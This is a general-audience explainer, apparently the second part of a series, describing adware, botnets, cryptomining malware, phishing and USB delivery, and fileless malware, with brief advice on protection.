Cyberattacks and malware are one of the biggest threats on the internet.
Here is Part 2 of information necessary to learn about the different types of malware – and how to avoid falling victim to attacks.
What is adware?
The ultimate goal of many cybercriminals is to make money — and for some, adware is just the way to do it. Adware does exactly what it says on the tin — it’s designed to maliciously push adverts onto the user, often in such a way that the only way to get rid of them is to click through to the advert. For the cybercriminals, each click brings about additional revenue.
In most cases, the malicious adverts aren’t there to steal data from the victim or cause damage to the device, just sufficiently annoying to push the user into repeatedly clicking on pop-up windows. However, in the case of mobile devices, this can easily lead to extreme battery drain or render the device unusable due to the influx of pop-up windows taking up the whole screen.
What is a botnet?
A botnet — short for robot network — involves cybercriminals using malware to secretly hijack a network of machines in numbers, which can range from a handful to millions of compromised devices. While it is not malware in itself, these networks are usually built by infecting vulnerable devices.
Each of the machines falls under the control of a single attacking operation, which can remotely issue commands to all of the infected machines from a single point.
By issuing commands to all the infected computers in the zombie network, attackers can carry out coordinated large-scale campaigns, including DDoS attacks, which leverage the power of the army of devices to flood a victim with traffic, overwhelming their website or service to such an extent it goes offline.
Other common attacks carried out by botnets include spam email attachment campaigns — which can also be used to recruit more machines into the network — and attempts to steal financial data, while smaller botnets have also been used in attempts to compromise specific targets.
Botnets are designed to stay quiet to ensure the user is completely oblivious that their machine is under the control of an attacker.
As more devices become connected to the internet, more devices are becoming targets for botnets. The infamous Mirai botnet — which slowed down internet services in late 2016 — was partially powered by Internet of Things devices, which could easily be roped into the network thanks to their inherently poor security and lack of malware removals tools.
What is cryptocurrency miner malware?
The high profile rise of bitcoin has helped push cryptocurrency into the public eye. In many instances, people aren’t even buying it, but are dedicating a portion of the computing power of their computer network or website to mine for it.
While there are plenty of instances of internet users actively engaging in this activity on their terms — it’s so popular the demand has helped to push up the price of PC gaming graphics cards — cryptocurrency mining is also being abused by cyber attackers.
There’s nothing underhanded or illegal about cryptocurrency mining in itself, but in order to acquire as much currency as possible — be it bitcoin, Monero, Etherium or something else — some cybercriminals are using malware to secretly capture PCs and put them to work in a botnet, all without the victim being aware their PC has been compromised.
One of the largest cybercriminal cryptocurrency networks, the Smominru botnet, is thought to consist of over 500,000 systems and to have made its operators at least $3.6 million dollars.
Typically, a cryptocurrency miner will deliver malicious code to a target machine with the goal of taking advantage of the computer’s processing power to run mining operations in the background.
The problem for the user of the infected system is that their system can be slowed down to almost a complete stop by the miner using big chunks of its processing power — which to the victim looks as if it is happening for no reason.
PCs and Window servers can be used for cryptocurrency mining, but Internet of Things devices are also popular targets for compromising for the purposes of illicitly acquiring funds. The lack of security and inherently connected nature of many IoT devices makes them attractive targets for cryptocurrency miners — especially as the device in question is likely to have been installed and perhaps forgotten about.
Analysis by Cisco Talos suggests a single system compromised with a cryptocurrency miner could make 0.28 Monero a day. It might sound like a tiny amount, but an enslaved network of 2,000 systems could add the funds up to $568 per day — or over $200,000 a year.
How is malware delivered?
In the past, before the pervasive spread of the World Wide Web, malware and viruses would need to be manually, physically, delivered, via floppy disc or CD Rom.
In many cases, malware is still delivered by using an external device, although nowadays it is most likely to be delivered by a flash drive or USB stick. There are instances of USB sticks being left in car parks outside targeted organisations, in the hope that someone picks one up out of curiosity and plugs it into a computer connected to the network.
However, more common now is malware that is delivered in a phishing email with payloads distributed as an email attachment.
The quality of the spam email attempts vary widely — some efforts to deliver malware will involve the attackers using minimal effort, perhaps even sending an email containing nothing but a randomly named attachment.
In this instance, the attackers are hoping to chance on someone naive enough to just go ahead and click on email attachments or links without thinking about it — and that they don’t have any sort of malware protection installed.
A slightly more sophisticated form of delivering malware via a phishing email is when attackers send large swathes of messages, claiming a user has won a contest, needs to check their online bank account, missed a delivery, needs to pay taxes, or even is required to attend court — and various other messages which upon first viewing may draw the target to instantly react.
For example, if the message has an attachment explaining (falsely) that a user is being summoned to court, the user may click on it due to the shock, opening the email attachment — or clicking a link — to get more information. This activates the malware, with the likes of ransomware and trojans often delivered in this way.
If the attackers have a specific target in mind, the phishing email can be specifically tailored to lure in people within one organisation, or even just an individual. It’s this means of delivering malware which is often associated with the most sophisticated malware campaigns.
However, there are many other ways for malware to spread that do not require action by the end user — through networks and through other software vulnerabilities.
What is fileless malware?
As traditional malware attacks are being slowed by prevention tactics including the use of robust anti-virus or anti-malware systems, and users are becoming cautious of unexpected emails and strange attachments, attackers are being forced to find other ways to drop their malicious payloads.
One increasingly common means of this is via the use of fileless malware. Rather than relying on a traditional method of compromise like downloading and executing malicious files on a computer — which can often be detected by anti-virus software solutions — the attacks are delivered in a different way.
Instead of requiring execution from a dropped file, fileless malware attacks rely on leveraging zero-day exploits or launching scripts from memory, techniques that can be used to infect endpoints without leaving a tell-tale trail behind.
This is achieved because the attacks uses a system’s own trusted system files and services to obtain access to devices and launch nefarious activity — all while remaining undetected because anti-virus doesn’t register wrongdoing.
Exploiting the infrastructure of the system in this way allows the attackers to create hidden files and folders or create scripts they can use to compromise systems, connect to networks, and eventually command and control servers, providing a means of stealthily conducting activity.
The nature of malware means not only is it difficult to detect, but difficult to protect against by some forms of antivirus software. But ensuring that systems are patched, up to date, and restricted users from adopting admin privileges, can help.
